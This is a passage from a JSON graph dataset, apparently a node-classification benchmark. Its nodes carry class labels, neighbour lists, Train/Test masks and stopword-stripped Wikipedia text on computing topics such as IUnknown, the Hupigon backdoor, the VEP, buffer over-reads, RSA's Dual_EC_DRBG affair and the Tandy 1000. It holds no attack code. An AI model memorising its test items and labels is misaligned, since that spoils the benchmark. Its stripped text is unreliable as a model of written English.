    "text": "IUnknown:iunknown computer programming iunknown interface fundamental interface component object model com com specification mandates com objects must implement interface furthermore every com interface must derived iunknown iunknown exposes two essential features com objects object lifetime management reference counting access object functionality interfaces iunknown iunknown-derived interface consists pointer virtual method table contains list pointers functions implement functions declared interface order declared interface in-process invocation call overhead therefore identical virtual method calls c++ iunknown interface exposes three methods codice_1 codice_2 codice_3 iunknown interface id defined guid value 00000000-0000-0000-c000-000000000046 com component interfaces required exhibit reflexive symmetric transitive properties reflexive property refers ability codice_1 call given interface interface id return instance interface symmetric property requires interface b retrieved interface via codice_1 interface retrievable interface b well transitive property requires interface b obtainable interface interface c obtainable interface b interface c retrievable interface",
    "neighbors": [
      2402,
      6500,
      10026,
      5677,
      3790,
      10029,
      9490,
      8246,
      8473,
      3102
    ],
    "mask": "Test"
  },
  {
    "node_id": 2147,
    "label": 4,
    "text": "Hupigon:hupigon hupigon also graftor detected backdoor.win32.hupigon trojan.win32.hupigon backdoor.win32.graftor trojan.win32.graftor backdoor trojan first known detection goes back november 2008 according securelist kaspersky labs malicious software usually portable executable may packed upx mostly used order connect worldwide group victimized pcs form botnet also known zombie network software able spread networks order infect computers computer worms see conficker difference backdoors spread automatically worms started command control-center supervising hupigon family large number variants written borland delphi",
    "neighbors": [
      3072,
      7809,
      5636,
      3852,
      4883,
      9630,
      7983,
      10166,
      10297,
      1994,
      3704,
      10574,
      1113,
      7515,
      4830,
      5087,
      4063,
      1381,
      1254,
      107,
      10987,
      8045,
      4462,
      6520,
      2041
    ],
    "mask": "Test"
  },
  {
    "node_id": 2148,
    "label": 4,
    "text": "Vulnerabilities_Equities_Process:vulnerabilities equities process vulnerabilities equities process vep process used u.s. federal government determine case-by-case basis treat zero-day computer security vulnerabilities whether disclose public help improve general computer security keep secret offensive use government adversaries vep first developed period 2008-2009 became public 2016 government released redacted version vep response foia request electronic frontier foundation following public pressure greater transparency wake shadow brokers affair u.s. government made public disclosure vep process november 2017 according vep plan published 2017 equities review board erb primary forum interagency deliberation determinations concerning vep erb meets monthly may also convened sooner immediate need arises erb consists representatives following agencies national security agency serves executive secretariat vep according november 2017 version vep process follows agency finds vulnerability notify vep secretariat soon possible notification include description vulnerability vulnerable products systems together agency recommendation either disseminate restrict vulnerability information secretariat notify participants submission within one business day requesting respond relevant interest agency expressing interest must indicate whether concurs original recommendation disseminate restrict within five business days hold discussions submitting agency vep secretariat within seven business days attempt reach consensus consensus reached participants suggest options equities review board decisions whether disclose restrict vulnerability made quickly full consultation concerned agencies overall best interest competing interests missions u.s. government far possible determinations based rational objective methodologies taking account factors prevalence reliance severity review board members reach consensus vote preliminary determination agency equity disputes decision may providing notice vep secretariat elect contest preliminary determination agency contests preliminary determination treated final decision vulnerability information released done quickly possible preferably within seven business days disclosure vulnerabilities conducted according guidelines agreed members submitting agency presumed knowledgeable vulnerability responsible disseminating vulnerability information vendor submitting agency may elect delegate dissemination responsibility another agency behalf releasing agency promptly provide copy disclosed information vep secretariat record keeping additionally releasing agency expected follow-up erb determine whether vendor ’ action meets government requirements vendor chooses address vulnerability acting urgency consistent risk vulnerability releasing agency notify secretariat government may take mitigation steps vep process criticized number deficiencies including restriction non-disclosure agreements lack risk ratings special treatment nsa less whole-hearted commitment disclosure default option",
    "neighbors": [
      1986,
      5636,
      3944,
      297,
      6344,
      4813,
      7119,
      7887,
      7345,
      10290,
      7893,
      8726,
      3544,
      8667,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 2149,
    "label": 2,
    "text": "Universal_binary:universal binary universal binary apple parlance executable file application bundle runs natively either powerpc intel-manufactured ia-32 intel 64-based macintosh computers implementation concept generally known fat binary release mac os x snow leopard since move 64-bit architectures general software publishers mozilla used term universal refer fat binary includes tailored builds i386 32-bit intel x86_64 systems mechanism used select powerpc intel builds application also used select 32-bit 64-bit builds either powerpc intel architectures apple however continues require native compatibility powerpc intel order grant third-party software publishers permission use apple trademarks related universal binaries time apple specify whether third-party software publishers must bundle separate builds 32-bit 64-bit variants either architecture universal binaries introduced 2005 apple worldwide developers conference means ease transition existing powerpc architecture systems based intel processors began shipping 2006 universal binaries typically include powerpc x86 versions compiled application operating system detects universal binary header executes appropriate section architecture use allows application run natively supported architecture negative performance impact beyond increase storage space taken larger binary starting mac os x snow leopard intel-based macs supported software specifically depends upon capabilities present mac os x 10.6 newer run intel-based macs therefore require intel/ppc fat binaries additionally starting os x lion 64-bit intel macs supported software specifically depends new features os x 10.7 newer run 64-bit processors therefore require 32-bit/64-bit fat binaries presently fat binaries would necessary software designed backward compatibility older versions mac os x running older hardware two general alternative solutions first simply provide two separate binaries one compiled x86 architecture one powerpc architecture however confusing software users unfamiliar difference two although confusion remedied improved documentation use hybrid cds alternative rely emulation one architecture system running architecture approach results lower performance generally regarded interim solution used universal binaries specifically compiled binaries available see rosetta universal binaries larger single-platform binaries multiple copies compiled code must stored however non-executable resources shared two architectures size resulting universal binary usually smaller binaries combined also require extra ram one two copies loaded execution apple previously used similar technique transition 68k processors powerpc mid-1990s dual-platform executables called fat binaries referring larger file size nextstep another predecessor mac os x supported fat binaries one application bundle could run multiple architectures including motorola m68k intel x86 sun microsystems sparc hewlett-packard pa-risc binary format underlying universal binary mach-o archive format used fat binary nextstep apple xcode 2.1 supports creation files new feature release simple application developed processor-independence mind might require changes compile universal binary complex application designed take advantage architecture-specific features might require substantial modification applications originally built using development tools might require additional modification reasons given delay introduction intel-based macintosh computers availability third-party applications universal binary format apple delivery intel-based computers several months ahead previously announced schedule another factor gap apple xcode 2.4 takes concept universal binaries even allowing four-architecture binaries created 32- 64-bit intel powerpc therefore allowing single executable take full advantage cpu capabilities mac os x machine many software developers provided universal binary updates products since 2005 wwdc december 2008 apple website lists 7,500 universal applications april 16 2007 adobe systems announced release adobe creative suite 3 first version application suite universal binary format march 2008 many applications mac os x ported universal binary including quarkxpress apple final cut studio adobe creative suite microsoft office 2008 shockwave player beginning version 11 non-universal 32-bit powerpc programs run intel macs running mac os x 10.4 10.5 10.6 cases non-optimal performance since must translated on-the-fly rosetta run mac os x 10.7 lion later rosetta longer part os unix file command macos several unix-like systems identify mach-o universal binaries report architecture support snow leopard system profiler provides information applications tab",
    "neighbors": [
      4615,
      5647,
      1042,
      6700,
      4657,
      1074,
      9802,
      5713,
      5205,
      3670,
      4184,
      2141,
      4702,
      3691,
      8303,
      6771,
      2676,
      4724,
      9337,
      9343,
      3719,
      10888,
      11402,
      8852,
      1686,
      7318,
      3228,
      2207,
      1699,
      5292,
      8877,
      1710,
      3766,
      2232,
      9912,
      11449,
      9406,
      1729,
      6849,
      713,
      9418,
      3790,
      7378,
      4310,
      9430,
      3289,
      4318,
      231,
      6377,
      9451,
      5356,
      10478,
      2288,
      8944,
      7928,
      8441,
      1273,
      7422,
      11521,
      2819,
      1796,
      5380,
      5384,
      9487,
      10512,
      5397,
      4888,
      11037,
      811,
      3371,
      7983,
      10036,
      9529,
      4933,
      10057,
      5450,
      9035,
      11602,
      1878,
      2907,
      4457,
      1399,
      9100,
      9109,
      1439,
      10153,
      9665,
      6093,
      7118,
      5078,
      3035,
      4571,
      1501,
      4068,
      5093,
      487,
      5612,
      10221,
      499,
      5619,
      11257,
      7163,
      8700,
      9213
    ],
    "mask": "Test"
  },
  {
    "node_id": 2150,
    "label": 5,
    "text": "Open_Settlement_Protocol:open settlement protocol open settlement protocol osp client/server protocol used internet service providers exchange authorization accounting usage information support ip telephony open settlement protocol implemented voice telephony gateways softswitches h.323 multimedia conferencing gateways session initiation protocol sip proxies osp defined european telecommunications standards institute etsi project tiphon telecommunications internet protocol harmonization networks press release september 2 1998 announced industry leaders 3com corporation cisco gric communications ipass inc. transnexus teamed promote inter-domain authentication authorization accounting standards ip telephony open settlement protocol osp open settlement protocol developed authority european telecommunications standards institute etsi project tiphon tiphon project objective one benefits new open settlement protocol flexible feature-rich information exchange via extensible markup language xml message system defined protocol architecture uses http communicate principal message content includes mime header together xml document codice_1 open settlement protocol standard specification may found document etsi technical specification 101 321 telecommunications internet protocol harmonization networks tiphon release 4 open settlement protocol inter-domain pricing authorisation usage exchange version 4.1.1 document ratified november 2003 document statement scope reads section 6 xml content xml element attribute declarations section define provisional dtd open settlement protocol osp toolkit complete development kit software developers want implement client side european telecommunication standards institute etsi osp standard secure voip peering osp toolkit includes source code written ansi c test tools extensive documentation implement osp standard hosted osp test server freely available internet developers test osp implementation",
    "neighbors": [
      7407,
      10271,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 2151,
    "label": 4,
    "text": "Employee_monitoring_software:employee monitoring software employee monitoring software means employee monitoring allows company administrators monitor supervise employee computers central location normally deployed business network allows easy centralized log viewing via one central networked pc sometimes companies opt monitor employees using remote desktop software instead employee monitoring software used supervise employees performance prevent illegal activities avoid confidential info leakage catch insider threats nowadays employee monitoring software widely used technology companies employee monitoring program monitor almost everything computer keystrokes passwords inputted websites visited chats facebook messenger skype social chats piece monitoring software also capture screenshots mobile activities administrator view logs cloud panel receive logs email may better inform employees advance administrator plans use employee monitoring software employees computers way employees may behave well try make mistakes case employees increase efficiency create value company",
    "neighbors": [
      10756,
      5542,
      5351,
      3729,
      9233,
      9781,
      150,
      10392,
      7515,
      8638
    ],
    "mask": "Test"
  },
  {
    "node_id": 2152,
    "label": 4,
    "text": "Buffer_over-read:buffer over-read computer security programming buffer over-read anomaly program reading data buffer overruns buffer boundary reads tries read adjacent memory special case violation memory safety buffer over-reads triggered heartbleed bug maliciously crafted inputs designed exploit lack bounds checking read parts memory intended accessible may also caused programming errors alone buffer over-reads result erratic program behavior including memory access errors incorrect results crash breach system security thus basis many software vulnerabilities maliciously exploited access privileged information programming languages commonly associated buffer over-reads include c c++ provide built-in protection using pointers access data part virtual memory automatically check reading data block memory safe respective examples attempting read elements contained array failing append trailing terminator null-terminated string bounds checking prevent buffer over-reads fuzz testing help detect",
    "neighbors": [
      2304,
      5636,
      4747,
      5008,
      3473,
      9490,
      11539,
      541,
      3871,
      1954,
      814,
      5682,
      3512,
      2625,
      1474,
      8262,
      1736,
      4424,
      6730,
      6221,
      2383,
      5840,
      5074,
      6868,
      86,
      2262,
      5080,
      4572,
      1247,
      8545,
      8573,
      7403,
      634,
      2045,
      2558,
      7039
    ],
    "mask": "None"
  },
  {
    "node_id": 2153,
    "label": 7,
    "text": "Ayotle:ayotle ayotle french-mexican company headquartered paris france develops computer vision software provides technical services based motion capture 3d sensors interactive applications media entertainment industry company co-founded josé alonso ybanez zepeda gisèle belliot june 2010 ayotle ’ expertise centres development implementation advanced algorithms computer vision video images formats use 3d cameras depth sensors ayotle developed two main innovative software solutions facetracker using highly advanced technologies markerless motion capture ayotle offers new solutions computer facial animation anytouch project ayotle provides solution transform surface object touch device name ayotle comes word ayotl means turtle shell nahuatl original language used aztecs mexico ayotle currently supported paris region lab astia mairie de paris oséo scientipôle initiative cap-digital telecom paristech",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 2154,
    "label": 4,
    "text": "RSA_Security:rsa security rsa security llc formerly rsa security inc. business rsa american computer network security company focus encryption encryption standards rsa named initials co-founders ron rivest adi shamir leonard adleman rsa public key cryptography algorithm also named among products rsa bsafe cryptography libraries securid authentication token rsa known allegedly incorporating backdoors developed nsa products also organizes annual rsa conference information security conference founded independent company 1982 rsa security acquired emc corporation 2006 us 2.1 billion operated division within emc emc acquired dell technologies 2016 rsa became part dell technologies family brands rsa based bedford massachusetts regional headquarters bracknell uk singapore numerous international offices ron rivest adi shamir leonard adleman developed rsa encryption algorithm 1977 founded rsa data security 1982 march 17 2011 rsa disclosed attack two-factor authentication products attack similar sykipot attacks july 2011 sk communications hack nightdragon series attacks rsa called advanced persistent threat today securid commonly used software token rather older physical tokens rsa relationship nsa changed years reuter joseph menn cybersecurity analyst jeffrey carr noted two adversarial relationship early years rsa leaders prominent advocates strong cryptography public use nsa bush clinton administrations sought prevent proliferation mid-1990s rsa bidzos led fierce public campaign clipper chip encryption chip backdoor would allow u.s. government decrypt communications clinton administration pressed telecommunications companies use chip devices relaxed export restrictions products used restrictions prevented rsa security selling software abroad rsa joined civil libertarians others opposing clipper chip among things distributing posters foundering sailing ship words sink clipper rsa security also created des challenges show widely used des encryption breakable well-funded entities like nsa relationship shifted adversarial cooperative bidzos stepped ceo 1999 according victor chan led rsa department engineering 2005 joined 10 people labs fighting nsa became different company later example rsa reported accepted 10 million nsa 2004 deal use nsa-designed dual ec drbg random number generator bsafe library despite many indications dual_ec_drbg poor quality possibly backdoored rsa security later released statement dual_ec_drbg kleptographic backdoor march 2014 reported reuters rsa also adapted extended random standard championed nsa later cryptanalysis showed extended random add security rejected prominent standards group internet engineering task force extended random however make nsa backdoor dual_ec_drbg tens thousands times faster use attackers key dual_ec_drbg backdoor presumably nsa extended nonces extended random made part internal state dual_ec_drbg easier guess rsa security java version hard crack without extended random since caching dual_ec_drbg output e.g rsa security c programming language version already made internal state fast enough determine indeed rsa security implemented extended random java implementation dual_ec_drbg 2004 2013 rsa shipped security software — bsafe toolkit data protection manager — included default cryptographically secure pseudorandom number generator dual ec drbg later suspected contain alleged secret national security agency kleptographic backdoor alleged backdoor could made data encrypted tools much easier break nsa allegedly secret private key backdoor scientifically speaking alleged backdoor employs kleptography essentially instance diffie hellman kleptographic attack published 1997 adam young moti yung rsa security employees aware least dual_ec_drbg might contain backdoor three employees members ansi x9f1 tool standards guidelines group dual_ec_drbg submitted consideration early 2000s possibility random number generator could contain backdoor first raised ansi x9 meeting according john kelsey co-author nist sp 800-90a standard contains dual_ec_drbg january 2005 two employees cryptography company certicom — also members x9f1 group — wrote patent application described backdoor dual_ec_drbg identical nsa one patent application also described three ways neutralize backdoor two — ensuring two arbitrary elliptic curve points p q used dual_ec_drbg independently chosen smaller output length — added standard option though nsa backdoored version p q large output length remained standard default option kelsey said knew implementers actually generated non-backdoored p q reports implementations using smaller outlet nevertheless nist included dual_ec_drbg 2006 nist sp 800-90a standard default settings enabling backdoor largely behest nsa officials cited rsa security early use random number generator argument inclusion standard also fix unrelated backdoor problem csprng predictable gjøsteen pointed earlier 2006 lead gjøsteen call dual_ec_drbg cryptographically sound ansi standard group members microsoft employees dan shumow niels ferguson made public presentation backdoor 2007 commenting shumow ferguson presentation prominent security researcher cryptographer bruce schneier called possible nsa backdoor rather obvious wondered nsa bothered pushing dual_ec_drbg included general poor quality possible backdoor would ensure nobody would ever use seem general awareness rsa security made default products 2004 snowden leak september 2013 new york times drawing snowden leaks revealed nsa worked insert vulnerabilities commercial encryption systems systems networks endpoint communications devices used targets part bullrun program one vulnerabilities times reported dual_ec_drbg backdoor renewed focus dual_ec_drbg noted rsa security bsafe used dual_ec_drbg default previously widespread awareness new york times published article rsa security recommended users switch away dual_ec_drbg denied deliberately inserted backdoor rsa security officials largely declined explain remove dubious random number generator flaws became known implement simple mitigation nist added standard neutralize suggested later verified backdoor reuters joseph menn reported nsa secretly paid rsa security 10 million 2004 set dual_ec_drbg default csprng bsafe story quoted former rsa security employees saying alarms raised deal handled business leaders rather pure technologists interviewed cnet schneier called 10 million deal bribe rsa officials responded entered contract engaged project intention weakening rsa ’ products menn stood story media analysis noted rsa reply non-denial denial denied company officials knew backdoor agreed deal assertion menn story make wake reports several industry experts cancelled planned talks rsa 2014 rsa conference among mikko hyppönen finnish researcher f-secure cited rsa denial alleged 10 million payment nsa suspicious hyppönen announced intention give talk governments malware authors conference quickly set reaction reports trustycon held day one block away rsa conference 2014 rsa conference former rsa security executive chairman art coviello defended rsa security choice keep using dual_ec_drbg saying became possible concerns raised 2007 might merit nist acknowledged problems 2013 rsa known securid product provides two-factor authentication hundreds technologies utilizing hardware tokens rotate keys timed intervals software tokens one time codes 2016 rsa re-branded securid platform rsa securid access release added single-sign-on capabilities cloud authentication resources using saml 2.0 types federation rsa securid® suite also contains rsa identity governance lifecycle solution formally aveksa solution provides visibility access within organization manages access various capabilities access review request provisioning rsa envision security information event management siem platform centralised log-management service claims enable organisations simplify compliance process well optimise security-incident management occur april 4 2011 emc purchased netwitness added rsa group products netwitness packet capture tool aimed gaining full network visibility detect security incidents tool re-branded rsa security analytics combination rsa envision netwitness siem tool log packet capture rsa archer grc platform software supports business-level management governance risk management compliance grc platform allows users adapt solutions requirements build new applications integrate external systems without touching single line code product originally developed archer technologies emc acquired 2010",
    "neighbors": [
      9218,
      11653,
      3590,
      6153,
      1930,
      7563,
      141,
      1297,
      1683,
      3097,
      5918,
      9246,
      11040,
      161,
      8865,
      1315,
      11175,
      9640,
      939,
      5677,
      10801,
      184,
      317,
      3774,
      10302,
      3521,
      9537,
      6852,
      10951,
      7887,
      3282,
      9170,
      10329,
      7899,
      10207,
      11233,
      7522,
      8674,
      107,
      11248,
      9713,
      10615,
      1400,
      6907,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 2155,
    "label": 3,
    "text": "Stardent_Inc.:stardent inc. stardent computer inc. manufacturer graphics supercomputer workstations late 1990s company formed 1989 ardent computer corporation formerly dana computer inc. stellar computer inc. merged stellar computer founded 1985 newton massachusetts headed william poduska previously founded prime computer apollo computer company aimed produce workstation system enough performance serious threat titan lower price ardent responded starting work new desktop system called stiletto featured two mips r3000s paired two r3010 fpus four i860s graphics processing i860s replaced vector units first product demonstrated march 1988 investment japanese company mitsui others announced june 1988 bringing total capital raised 48 million almost time november 1985 alan h. michaels matthew sanders iii co-founded dana computer inc. sunnyvale california silicon valley company sought produce desktop multiprocessing supercomputer dedicated graphics could support four processor units processor unit consisted initially mips r2000 cpu later r3000 connected custom vector processor vector unit held 8,192 64-bit registers could used way 8,192 one-word thirty-two 256-word registers compares modern simd systems allow perhaps eight sixteen 128-bit registers small variety addressing schemes changed company name dana ardent learning local disk drive company called dana goal release titan competitor july 1987 50,000 price point late 1986 however became clear unrealistic second round funding came kubota corporation japanese heavy industries company cash spare looking new opportunities kubota agreed fund completion titan also provide production facilities japan time finally ready testing february 1988 performance leadership position titan eroded price risen 80,000 ardent software ran unix system v release 3 proprietary support four-way smp vector processor compiler based convex fortran c compiler significant graphics system visualization dore dynamic object rendering environment gordon bell architect vax computer early member ardent michaels considered working poduska founded convergent technologies instead ardent japan-based kubota corporation became major investor owning 44 ardent delay product introduced 1988 merger two rivals announced august 30 1989 completed november 1989 poduska chief executive bell served chief scientist although stardent products known high performance also demanded high prices 1990 model quoted 123,400 example although much less cray y-mp kubota alleged forced merger odd twist original stellar group left corporate power number ardent employees less happy move quit form companies others attempted get kubota spin original development group new company called comet nothing came early july 1990 california portion stardent transferred company headquarters massachusetts co-chairmen michaels sanders brought suit kubota july 13 25 million damages contending kubota used financial leverage ardent force merge transfer people technology kubota unit july 24 1990 stardent fired co-chairmen michaels sanders offering settlement avoid publicity august board directors dismissed michaels sanders board agreed sell equity company kubota additional 60 million august 1991 stardent spun popular application visualization system avs software separate company november year stardent announced would cease operate name stardent computer sell titan workstation operations kubota pacific computers find buyer vistra workstations create new company called gs computer services provide maintenance support discontinued gs series workstations inherited stellar investors lost estimated 200 million remainder company would focus avs software system existing shareholders stardent would become shareholders software firm end year company given finding buyer believed oki electric vistra line workstations still hoped sell underlying graphics technology based intel i860 stardent decided liquidate rather pursuing new funding kubota corporation sales estimated 40 million 1990 limited ability compete workstation manufacturers ibm hp silicon graphics kubota pacific cast looking direction finally settling desktop-sized 3d graphics accelerator alpha-based dec 3000 axp workstations called denali company also bought dec 3000 axp workstations packaged denali sold integrated product kenai workstation company changed name becoming kubota graphics company closed 1994 1994 kubota graphics bought accelgraphics maker accelgraphics ag300 ag500 accelgraphics turn acquired evans sutherland 1998 stellar line called graphics supercomputer gs considered advanced design late 1980s stellar gs workstation family consisted gs1000 gs2000 models stellar merged ardent form stardent sold st1000 st2000 models gs2000 cpu supported four threads streams execution total 20 mips vector coprocessor capable 80 mflops 16 128mb system memory supported 64mb memory typical four threads implemented using barrel processor design similar used cdc 6000 series denelcor hep gs2000 graphics subsystem supported interactive 3d rendering rates 120,000 gouraud-shaded triangles per second 600,000 short vectors per second texture mapping antialiasing accumulation buffer also supported cpu graphics system shared system memory vector coprocessor gs workstations used x window system 3d hardware programmed x extension known xfdi x floating-point device interface bindings c fortran display supported 1280 1024 resolution 12 24 bits per pixel pseudo-color true-color modes 12 24-bit z buffers supported gs2000 cabinet quite large approximately 30 inches wide 48 inches tall 36 inches deep companion expansion chassis size could contain 9-track tape drive example",
    "neighbors": [
      10051,
      3142,
      9126,
      1480,
      5384,
      6250,
      783,
      1360,
      5492,
      1461,
      10612,
      11604,
      3960,
      3323
    ],
    "mask": "Test"
  },
  {
    "node_id": 2156,
    "label": 1,
    "text": "Anime_News_Network:anime news network anime news network ann anime industry news website reports status anime manga video games japanese popular music related cultures within north america australia southeast asia japan website offers reviews editorial content forums readers discuss current issues events encyclopedia contains large number anime manga information japanese english staff theme music plot summaries user ratings founded july 1998 justin sevakis website claims leading english-language source news information anime manga internet site operated 2008 magazine protoculture addicts website separate versions news content aimed towards audiences four separate regions united states canada australia new zealand southeast asia france international version website founded justin sevakis july 1998 may 2000 current ceo christopher macdonald joined website editorial staff replacing former editor-in-chief isaac alexander july 2002 anime news network launched encyclopedia collaborative database anime manga titles also including information staff cast companies involved production localization titles january 2007 ann launched separate version australian audiences july 4 2008 ann launched video platform library anime trailers well news show anntv fall 2004 editorial staff ann became formally involved anime magazine protoculture addicts magazine began publishing ann editorial control january 2005 september 7 2004 sci fi channel online newsletter sci fi weekly named site web site week anime news network stories related anime manga researched ann staff contributors staff discretion also contribute news articles website maintains listing anime manga titles well people companies involved production titles dubs encyclopedia site hosted several regular columns including question-and-answer column hey answerman review column entitled shelf life column old forgotten media called buried treasure written sevakis listing claimed differences edited original versions anime series titled edit list staff members ann also publish blogs hosted site ann also hosts forums includes threads accompany news item purposes discussion anime news network hosts irc channel worldirc network animenewsnetwork august 7 2017 hacker took control anime news network domain animenewsnetwork.com compromised site twitter accounts including personal accounts ann ceo christopher macdonald executive editor zac bertschy site temporarily live animenewsnetwork.cc staff regained control original domain article days loss domain macdonald published full story domain stolen",
    "neighbors": [
      5762,
      5251,
      6696,
      11471,
      6449,
      735,
      8081,
      4724,
      10609,
      11443,
      8249,
      606,
      2591
    ],
    "mask": "Test"
  },
  {
    "node_id": 2157,
    "label": 0,
    "text": "Temporal_expressions:temporal expressions temporal expression text sequence tokens words numbers characters denote time express point time duration frequency examples initially temporal expressions considered type named entities identification part named entity recognition task since automatic content extraction program 2004 separate task identified called temporal expression recognition normalisation tern timex evaluation evaluated two major temporal annotation challenges tempeval i2b2 prefer timeml-level timex3 standard similarly ner systems temporal expression taggers created either using linguistic grammar-based techniques statistical models hand-crafted grammar-based systems typically obtained better results cost months work experienced linguists many systems available creating temporal expression recognizer scratch generally undesirable duplication effort instead current approaches focus novel subclasses timex statistical systems typically require large amount manually annotated training data usually applied recognition task although work done using machine learning algorithms resolve certain ambiguities interpretation step",
    "neighbors": [
      2059
    ],
    "mask": "None"
  },
  {
    "node_id": 2158,
    "label": 4,
    "text": "Fidelis_Cybersecurity:fidelis cybersecurity fidelis cybersecurity cybersecurity company focused threat detection hunting response advanced threats data breaches ibm united states army united states department commerce among customers fidelis offers network security appliances include company patented deep session inspection architecture company claims speed accuracy network traffic inspection among technical differentiators august 2012 general dynamics announced agreement acquire fidelis advanced information systems division april 2015 marlin equity partners entered agreement general dynamics acquire fidelis cybersecurity solutions intention creating new advanced threat defense service may 2015 wall street journal reported fidelis acquired resolution1 incident response endpoint detection response provider february 2016 new york times reported fidelis hired provide hardware software monitor university california network acquiring deception technology vendor topspin fidelis launched deception product january 2018..",
    "neighbors": [
      8288,
      939,
      2733,
      2324,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 2159,
    "label": 3,
    "text": "Tandy_1000:tandy 1000 tandy 1000 first line ibm pc compatible home computer systems produced tandy corporation sale radio shack radio shack computer center chains stores december 1983 executive tandy corporation maker trs-80 computers said new ibm pcjr 'm sure lot people coming pcjr look-alikes market big preparing tandy 2000—the company first ms-dos computer—for release november 1983 tandy began designing tandy 1000 code named august unlike 2000 would pc compatible ibm pc support pcjr graphics standard released november 1984 1,200 tandy 1000 offered functionality pcjr improved keyboard better expandability compatibility could ibm made mistake pcjr amazed tandy executive said regarding chiclet keyboard another claimed 1000 pcjr tandy 2000—not completely pc compatible—quickly failed although press saw 1000 former personal-computer leader tandy admitting could longer focus proprietary products market ibm pc dominated 1000 sold units first month tandy product early 1985 best-selling computer 1000 joystick ports like pcjr 16-color graphics 3-voice sound pcjr rom cartridge ports since ibm discontinued pcjr soon release 1000 tandy quickly removed mentions pcjr advertising emphasizing product pc compatibility although tandy initially marketed 1000 business computer like ibm pc infoworld stated 1985 company produced real home computer company claimed 1000 first fully ibm pc-compatible computer available less 1000 1000 helped company obtain 9.5 share us home-computer market 1986 year tandy stated half compatibles purchased home 1988 ceo john roach disagreed apple counterpart john sculley rejection home market let deny person well-represented home market wants abandon right tandy also regained significant share apple-dominated educational market two companies equally shared 1000 many successors successful unlike pcjr partly sold ubiquitous radio shack stores partly computer less costly easier expand almost entirely compatible ibm pc pcjr enhanced graphics sound standards became known tandy-compatible graphics sound built-in joystick ports 1000 best computer pc games vga graphics became popular 1990s software companies era advertised support tandy platform 28 66 games computer gaming world tested 1989 supported tandy graphics tandy 1000 computers first ibm pc clones incorporate complete set basic peripherals motherboard using proprietary asics forerunner chipset although original tandy 1000 came ibm pc-like desktop case models notably 1000 ex 1000 hx used home-computer-style cases keyboard motherboard disk drives one enclosure high level integration made machines cost-effective alternative larger complex ibm pc/xt pc/at-type systems required multiple add-in cards often purchased separately implement comparable feature-set tandy 1000 derived ibm pcjr architecture tandy 1000 offered several important features ibm pc-compatibles time lacked pcjr sound generator extended cga-compatible graphics controller also offered multiple built-in i/o ports including joystick port frequently separate add-on card non-tandy machines original line equipped intel 8088 cpu later extended faster clock speeds also 8086 80286 toward end line rsx 80386sx processors successors 1000 appended two three letters name space e.g tandy 1000 ex tandy 1000 hx instances letters slash appended followed either number additional letters e.g tandy 1000 tl/2 tandy 1000 rl/hd 1993 changes market made increasingly difficult tandy corporation make profit computer line tandy corporation sold computer manufacturing business ast computers tandy computer lines terminated radio shack stores began selling computers made manufacturers ibm compaq article subtitled junior meets match john j. anderson creative computing called original tandy 1000 machine ibm inept incapable afraid manufacture sure put whopping dent pcjr sales sales pc 'senior well favorably mentioned low price good pc-software compatibility bundled deskmate might never need another software package computer 80 micro approved 1000s pc compatibility stated exterior design gives feeling quality confidence magazine concluded tandy machine closely emulates basic functions ibm pc affordable price ... along security tandy substantial support network wondered people would buy 1000 ibm lowered price pc infoworld noted 1000s low price fully one-third less comparably equipped ibm pc predicted computer really intended elusive home computer market speculated retrospect might pcjr final straw magazine called 1000 almost fully ibm pc compatible computer get gave deskmate mixed review advised customers computer inability use full-length pc expansion cards concluded making 1000 inexpensive adaptable including deskmate tandy produced real home computer byte called 1000 good reasonably priced ibm pc clone best features ibm pc pcjr ... current prices good alternative noted high level software compatibility good keyboard stated deskmate fairly good ... little extra programming work could turned much better program noting that—for example—the word processor move command magazine also mentioned computer short slots pc magazine also noted slots criticized tandy 1000 fit finish acknowledged computer low price bundled hardware features tandy 1000 computers featured built-in video hardware enhanced sound hardware based one several variants texas instruments sn76496 sound generator numerous peripheral interfaces including game ports compatible trs-80 color computer ibm-standard floppy-disk controller supporting two drives parallel printer port integrated motherboard addition hardware standard ibm pc/xt later tandy 1000 models pc/at motherboards original tandy 1000 designers omitted dma controller pcjr one believed needed would add additional memory computer omitted rs-232 port tandy printers use parallel port believed customers would use internal modems earlier models tandy 1000 composite video output could used color monochrome composite monitor tv rf modulator original 1000 sx light-pen port unlike pc clones several tandy 1000 computers ms-dos built rom could boot seconds tandy bundled deskmate graphical suite consumer-oriented applications various tandy 1000 models early tandy 1000 models used phoenix bios common models machine included tandy 1000 1000 ex 1000 hx 1000 sx 1000 tx 1000 sl 1000 rl 1000 tl exception rlx rsx tandy 1000 machines xt-class machines support extended memory despite models using 80286 processors rlx oddity xt-class machine supports 384 kb extended memory rsx fully at-class machine support 9 mb extended memory exception 1000 ex hx tandy used industry standard 8-bit xt isa slots desktop models including sx tx sl tl series actual length limited 10.5 inches shorter rather industry standard xt length 13 inches 8-bit xt isa cards shorter 10.5 fit 1000 slots many 8-bit cards met length requirement cards hard cards ems memory cards multifunction cards required standard 13 length fit 1000 case ex hx utilized plus-style connector electronically identical 8-bit xt isa slot 62-pin berg connector instead card edge rendering incompatible isa cards without adapter plus connector designed compactness models built-in keyboards 1000 rsx featured two 16-bit isa slots hard disk drives time tandy 1000 introduction expensive tandy 1000 systems usually equipped hard drives however possible add hard drive tandy 1000 computers desktop-type tandy 1000 units could accept regular 8-bit isa bus mfm rll scsi controllers like typical xt-class machines however care taken configuring cards cause conflicts on-board tandy-designed peripherals tandy 1000 models compact ex hx come already equipped hard drive tandy offered hard disk options form hardcards installed one computer expansion slots consisted controller drive typically 3.5-inch mfm rll unit western digital controller mounted together metal bracket 20 mb hard card offered 799 though compatible third-party units available although arrangement provided neat physical coupling controller disk single-sector internal transfers dependence speed host machine transfer data memory meant trial-and-error approach still needed set disk interleave correctly ensure optimum transfer rates furthermore tandy 1000 slots 10.5 long 8-bit units would fit and/or operate correctly unless certified tandy-compatible starting tandy 1000 tl/2 xt ide controllers integrated onto motherboard however incompatible common ide hard drives tl/2 tl/3 rl rlx used xt ide interface later significantly upgraded rsx first tandy 1000 model computer use standard ide interface one option contemporary users systems would install use xt isa compactflash adapters also practical way install hard drive tandy 1000 ex hx using adapter cable adapts male plus-style connector 8-bit isa card-edge slot tandy 1000 sx tx used proprietary 8-pin round din connector keyboard port compatible older trs computers compatible ibm pc/at ps/2 standard scan codes differed tandy 1000 ibm pc/xt resulting software compatibility issues sl/tl later used 